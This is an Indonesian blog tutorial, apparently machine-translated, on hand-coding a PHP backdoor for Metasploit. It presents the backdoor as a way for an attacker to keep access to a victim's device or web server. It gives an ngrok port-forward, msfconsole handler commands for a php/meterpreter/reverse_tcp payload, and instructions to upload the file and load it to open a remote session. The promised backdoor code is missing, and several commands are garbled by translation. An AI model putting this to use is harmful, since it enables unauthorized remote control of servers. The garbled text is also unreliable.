Membuat Backdoor PHP Metasploit Secara Manual

  • Whatsapp
Membuat Backdoor PHP Metasploit Secara Manual
Membuat Backdoor PHP Metasploit Secara Manual

News.nextcloud.asia

Hai teman-teman, kami kembali dengan tutorial lain di mana kami akan mengajari Anda cara membuat backdoor php secara manual untuk metasploit dan kemudian cara mengeksploitasinya. Jadi jika kalian bersemangat mari kita mulai.






Banyak orang bertanya kepada saya apa keuntungan dari pengkodean manual atau membuat payload untuk metasploit ketika kita dapat membuatnya dengan metasploit?


Jadi mari kita misalkan jika seorang hacker atau penyerang memiliki perangkat korban untuk beberapa waktu dan tidak ada peralatan lain seperti Android. Laptop, dll. untuk menghasilkan backdoor. Jadi dalam hal ini mereka dapat secara manual membuat kode atau membuat pintu belakang di perangkat korban dan kemudian mengeksploitasinya kapan saja dengan metasploit.

Jadi pertama-tama Anda perlu mengatur penerusan porta karena seperti yang kita semua tahu php digunakan dalam aplikasi web sehingga itu keluar dari jaringan area lokal. Kita dapat melakukan port forwarding sementara dengan menggunakan server ngrok atau untuk akses permanen kita dapat menggunakan situs web portmap (Seperti yang telah kami sebutkan di posting kami sebelumnya).


Jadi dalam kasus saya, saya akan menunjukkan kepada Anda demo jadi gunakan ngrok untuk penerusan port sementara dan hasilnya dapatkan konfigurasi berikut.

> tcp://0.tcp.ngrok.io:14817 -> localhost:4444

Dalam kasus Anda selalu berbeda.

Jadi saatnya untuk membuat atau mengkode backdoor php (Jika Anda memiliki pengetahuan dasar php maka pekerjaan Anda mudah atau jika Anda tidak memilikinya, cukup tempel kode yang diberikan tetapi ingat untuk menambahkan kode Anda. tuan rumah lokal dan pelabuhan lokal di pintu belakang.

————————————————–( Salin Kode yang Diberikan) ————————————————- —————

/*

————————————————– ————————————————– ———————————-

Sekarang simpan file ini sebagai filename.php. Kamu dapat memakai Ctrl + F untuk menemukan lhost dan lport dalam kode dan kemudian masukkan detail Anda.

Catatan :- Ini penting untuk menambahkan lhost dan lport dalam kode jika tidak, payload tidak merespons

Semuanya selesai sekarang setup eksploitasi di konsol metasploit Anda dengan perintah yang diberikan.

$msfconsole

$ gunakan exploit/multi/penangan

$ mengatur payload php/meterpreter/reverse_tcp

$set lhost 0.0.0.0

$ setel port 4444

$ mengeksploitasi

Sekarang Anda hanya perlu mengunggah file php ini di server web dan kemudian menyegarkan www.example.com/filename.php. Sesi meterpreter Anda berhasil dimulai. gunakan perintah bantuan untuk opsi.

Saya harap informasi ini bermanfaat bagi Anda dan jika Anda menemukan sesuatu yang menarik di situs blog kami, pastikan untuk berlangganan kami untuk pembaruan di masa mendatang dan tetap terhubung di platform media sosial kami yang lain. Terima kasih telah berkunjung semoga harimu menyenangkan.

Mohit Saran (Raja Peretas)

Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan.